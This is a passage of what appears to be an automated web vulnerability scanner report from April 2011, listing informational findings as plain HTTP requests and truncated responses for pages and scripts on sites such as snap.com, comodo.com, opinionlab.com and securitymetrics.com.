Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:49 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Last-Modified: Sat, 03 Nov 2007 05:08:13 GMT
ETag: "31325ec-47e-43dff45274940"
Accept-Ranges: bytes
Content-Length: 1150
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................6E>.CQJ.........................CQJ.6E>.6E>.6E>.6E>.6E>.6E>.6E>.6E>.htn.............................6E>.6E>.6E>.6E>.6E>.6E>.6E>.6E>.htn...
...[SNIP]...

28.2. https://account.snap.com/javascript/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /javascript/jquery.js

Request

GET /javascript/jquery.js HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:04:04 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46412

/*
* jQuery 1.2.1 - New Wave Javascript
*
* Copyright (c) 2007 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2007/10/3
...[SNIP]...

28.3. https://account.snap.com/javascript/prototype.1.6.1.0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /javascript/prototype.1.6.1.0.js

Request

GET /javascript/prototype.1.6.1.0.js HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:42 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 139854

/* Prototype JavaScript framework, version 1.6.1
* (c) 2005-2009 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype
...[SNIP]...

28.4. https://account.snap.com/javascript/tab.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /javascript/tab.js

Request

GET /javascript/tab.js HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:32 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Vary: User-Agent
Content-Length: 1220
Connection: close
Content-Type: text/html; charset=UTF-8


function tab(num) {
var f = document.getElementById("login_form");
f.tab.value = num;
f.submit();
return false;
}

function submitTabForm(formName){
   createHiddenInput(formName, "cur
...[SNIP]...

28.5. https://olui2.fs.ml.com/publish/content/environment/environment.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olui2.fs.ml.com
Path:   /publish/content/environment/environment.xml

Request

GET /publish/content/environment/environment.xml HTTP/1.1
Host: olui2.fs.ml.com
Connection: keep-alive
Referer: https://olui2.fs.ml.com/login/login.aspx?sgt=3&_tps=53e1d1d2ef5543dabbbb6e0d12a34f8b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Bear=Hcxo9ifKwMEdwUzmNOGONC2+Zz35f2k/B8LmpM2blk0=

Response

HTTP/1.1 200 OK
Content-Length: 1131
Content-Type: text/xml
Content-Location: https://olui2.fs.ml.com/publish/content/environment/environment.xml
Last-Modified: Wed, 30 Mar 2011 17:55:25 GMT
Accept-Ranges: bytes
ETag: "806474a53efcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:28:22 GMT

<?xml version="1.0" encoding="utf-8" ?>
<environment>
<env_level>PROD</env_level>
<env_pathtotransform />
<env_protocol />
<env_url />
<env_host />
<env_pathname />
<env_se
...[SNIP]...

28.6. https://secure.comodo.com/management/passwordResetRequest.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /management/passwordResetRequest.html

Request

GET /management/passwordResetRequest.html HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: https://www.comodo.com/login/comodo-members.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:52:49 GMT
Content-Type: text/html
Last-Modified: Fri, 15 Dec 2006 13:25:17 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 2966

<html>
<head>
<title>Password Reset: Request</title>
<link rel="stylesheet" href="/css/css.css">
<script language="JavaScript" type="text/javascript">
<!--
function loginName_changed(

...[SNIP]...

28.7. https://secure.comodo.com/products/!hostedLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /products/!hostedLogin

Request

GET /products/!hostedLogin HTTP/1.1
Host: secure.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 12:45:03 GMT
Content-Type: text/html; charset=us-ascii
Connection: close
Content-Length: 222
Cache-Control: max-age=-1

<html>
<body>
Insecure Login Attempt: Your password may have been compromised.
<br><br>Please login <a href=https://secure.comodo.com/products/frontpage>here</a>
and change your password immedia
...[SNIP]...

28.8. https://secure.opinionlab.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /

Request

GET / HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4176
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSSARBAA=IDMHJNCDAGKPHFPBJELDADJB; path=/
Date: Tue, 26 Apr 2011 12:45:31 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>OnlineOpinion</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=Windows-1252">
<STYLE>
<!--
.main {FONT-FAMILY: Arial, Helvetica, Sans-serif; FONT-SIZE: 10
...[SNIP]...

28.9. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:41:01 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

28.10. https://secure.opinionlab.com/ccc01/comment_card_d.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_d.asp

Request

GET /ccc01/comment_card_d.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSSSARBAA=MFMHJNCDOEKIPAJALGIFIFEG; path=/
Date: Tue, 26 Apr 2011 12:45:42 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

28.11. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_json_4_0_b.asp

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8179
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSSSARBAA=ICKHJNCDOCHODDPLMDGOHIIG; path=/
Date: Tue, 26 Apr 2011 12:41:00 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS ON PAGE b: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<titl
...[SNIP]...

28.12. https://securitymetrics.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /

Request

GET / HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 00:52:33 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 10502

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Keywords" http-
...[SNIP]...

28.13. https://securitymetrics.com/login.adp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /login.adp

Request

GET /login.adp?login_type=customer&next_page=back HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 01:09:24 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 6067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<TITLE>Customer Login - SecurityMetrics</TIT
...[SNIP]...

28.14. https://securitymetrics.com/pricelist.adp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /pricelist.adp

Request

GET /pricelist.adp HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sitecertinfo.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 01:08:14 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 11445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Keywords" http-
...[SNIP]...

28.15. https://securitymetrics.com/register_home.adp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /register_home.adp

Request

GET /register_home.adp?action=new HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 01:09:24 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 50207


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<TITLE>Registration - SecurityMetrics</TITLE>

...[SNIP]...

28.16. https://securitymetrics.com/sitecertinfo.adp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sitecertinfo.adp

Request

GET /sitecertinfo.adp HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/PANscan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 01:08:09 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 9989

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Keywords" http-
...[SNIP]...

28.17. https://securitymetrics.com/sm/PANscan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/PANscan/

Request

GET /sm/PANscan/ HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=09f0146dbd92e08e1aac412eff15ddf24e6644aa; Path=/
Date: Tue, 26 Apr 2011 00:53:04 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 13228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>SecurityMe
...[SNIP]...

28.18. https://securitymetrics.com/sm/determinesaq/storechd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/storechd

Request

GET /sm/determinesaq/storechd HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/pricelist.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:33 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 8168


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...

28.19. https://securitymetrics.com/sm/determinesaq/terminaltype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/terminaltype

Request

GET /sm/determinesaq/terminaltype HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:49 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 12217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...

28.20. https://shots-s.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /snap_shots.js

Request

GET /snap_shots.js HTTP/1.1
Host: shots-s.snap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:03 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 12:41:02 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Content-Length: 15193
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 14:41:03 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

28.21. https://support.sentrigo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.sentrigo.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: support.sentrigo.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.3.10.1303780499; PHPSESSID=esjikd3cpu81nqjvdhe9ecrli0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:54 GMT
Server: Apache
Last-Modified: Sun, 10 Apr 2011 11:03:49 GMT
ETag: "2d401c-4486-69e10f40"
Accept-Ranges: bytes
Content-Length: 17542
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

......00.... ..%..F... .... ......%........ ..    ...6........ .h....@..(...0...`..... ......%............................................................................................................
...[SNIP]...

28.22. https://support.tenable.com/support-center/cerberus-support-center/themes/tenable/img/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.tenable.com
Path:   /support-center/cerberus-support-center/themes/tenable/img/favicon.ico

Request

GET /support-center/cerberus-support-center/themes/tenable/img/favicon.ico HTTP/1.1
Host: support.tenable.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; CerberusPublicGUI=26ko0fk8c8q45fu689ijjmn420

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:50:13 GMT
Server: Apache
Last-Modified: Sat, 11 Sep 2010 17:38:06 GMT
ETag: "64506d-47e-536e1b80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................:F...u...[...3..|...f{..C8..e'...M...u...r...s...2... ...s...z..u......................................................................
...[SNIP]...

28.23. https://www.comodo.com/login/comodo-members.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comodo.com
Path:   /login/comodo-members.php

Request

GET /login/comodo-members.php HTTP/1.1
Host: www.comodo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=44439b28ed50f35415dffbf574898661; __utmz=1.1303775073.1.1.utmgclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); ap=; referrerURL=; entryURL=http%3A//www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php%3Fgclid%3DCMO8iMjsuKgCFQ5-5Qodm1pYEg; wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01; sifrFetch=true; __utma=1.840845901.1303775073.1303775073.1303775073.1; __utmc=1; __utmb=1.4.10.1303775073; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:51:54 GMT
